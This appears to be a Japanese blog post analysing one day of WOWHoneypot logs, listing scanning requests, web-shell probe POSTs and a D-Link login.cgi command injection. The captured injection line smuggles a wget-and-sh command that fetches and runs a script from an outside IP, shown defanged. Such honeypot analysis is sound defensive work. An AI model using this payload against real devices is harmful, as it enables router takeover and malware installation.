WOWHoneypot簡易分析(14日目)
WOWhoneypotの2018/6/17(日)(運用14日目)の簡易分析です。
本日の総アクセス数は126件です。だいぶ落ち着きました。
50 [2018-06-17 "GET /
33 [2018-06-17 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
30 [2018-06-17 "HEAD /
1 [2018-06-17 "PROPFIND /
1 [2018-06-17 "POST /xx.php
1 [2018-06-17 "POST /xw.php
1 [2018-06-17 "POST /wuwu11.php
1 [2018-06-17 "POST /w.php
1 [2018-06-17 "POST /s.php
1 [2018-06-17 "POST /sheep.php
1 [2018-06-17 "POST /db.init.php
1 [2018-06-17 "GET /x
1 [2018-06-17 "GET /manager/html
1 [2018-06-17 "GET /index.php
1 [2018-06-17 "GET /iem/admin/index.php
1 [2018-06-17 "GET /admin/index.php
D-Linkの脆弱性を突く攻撃は日毎に件数が増加しています。(1件→8件→33件)
幾つかPOSTしているログがあるので、それを見てみます。
POST /wuwu11.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29h=die*1;
POST /xw.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29h=die*2;
POST /xx.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31axa=die*3;
POST /s.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32leng=die*4;
POST /w.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32leng=die*5;
POST /db.init.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32eval=die*6;
POST /sheep.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28m=die*7
7種類ありますが、どれもペイロードの中身はほぼ同じため、同じ目的の攻撃と思われます。
推測ですが、何らかのWebShellが埋め込まれているかの確認?という気がします。
それ以外のアクセスログはTomcat、phpMyAdminに関連するパスへのアクセスで、使用有無の調査行為と思われます。
ハンティングログは以下です。
33 [2018-06-17 wget hxxp://185.62.190[.]191/r
以上です。